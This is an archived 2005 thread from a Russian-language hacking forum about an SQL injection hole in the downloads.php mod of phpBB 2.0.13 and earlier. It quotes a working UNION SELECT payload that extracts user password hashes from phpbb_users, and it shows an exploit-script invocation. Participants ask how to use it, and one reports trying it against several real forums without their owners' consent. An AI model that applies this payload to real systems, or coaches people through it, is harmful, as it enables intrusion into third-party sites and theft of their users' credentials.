ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php
  #1  
Старый 05.04.2005, 22:47
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807

Репутация: 901


По умолчанию Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

Бедный, всеми измученный форум, и опять дыра =)

Читаем тут:

http://www.securitylab.ru/53767.html
 

  #2  
Старый 05.04.2005, 22:59
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

Угагагаааа))))) Ваще кранты =0)) Они же разорятся!
 

  #3  
Старый 05.04.2005, 23:01
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

Цитата:
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*
а разве модуль downloads встроен во все форумы?

Пример

C:\>phpbb.pl www.site.com /phpBB2/ 2

В Выполнить это вообще писать? или как. если адрес форума www.site.com/phpBB2/index.php
И как понимать вообще знак ">"

Последний раз редактировалось (-=util=-); 05.04.2005 в 23:18..
 

  #4  
Старый 05.04.2005, 23:35
Mefisto
Участник форума
Регистрация: 10.10.2004
Сообщений: 101
Провел на форуме:
6287

Репутация: 4
Отправить сообщение для Mefisto с помощью ICQ
По умолчанию

а как этим пользоваться?)))
 

  #5  
Старый 06.04.2005, 00:20
Sn_key
Участник форума
Регистрация: 07.03.2005
Сообщений: 160
Провел на форуме:
418635

Репутация: 30
Отправить сообщение для Sn_key с помощью ICQ
Unhappy

Блин!!! Несколько форумов перебрал все закрыты или
ужэ взломаны!!!Обьясните мож я чо не то делаю???
Цитата:
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2/*
Вот сплойт вставляю я его в адрес но не х не получается:
ДОКУМЕНТ НЕ НАЙДЕН!!!!!!!!!!
 

  #6  
Старый 06.04.2005, 06:05
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

lol. Это однас тсрочка только из сплойта =) Внимательнее читай просто
 

  #7  
Старый 06.04.2005, 09:27
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию

Эта дыра только в МОДЕ downloads.php, а он почти нигде не используется.
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 

  #8  
Старый 06.04.2005, 09:37
hacsoft
Познающий
Регистрация: 14.03.2005
Сообщений: 43
Провел на форуме:
59867

Репутация: 2
Отправить сообщение для hacsoft с помощью ICQ
По умолчанию

А где можно закачать этот мод? Дайте ссылочку.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ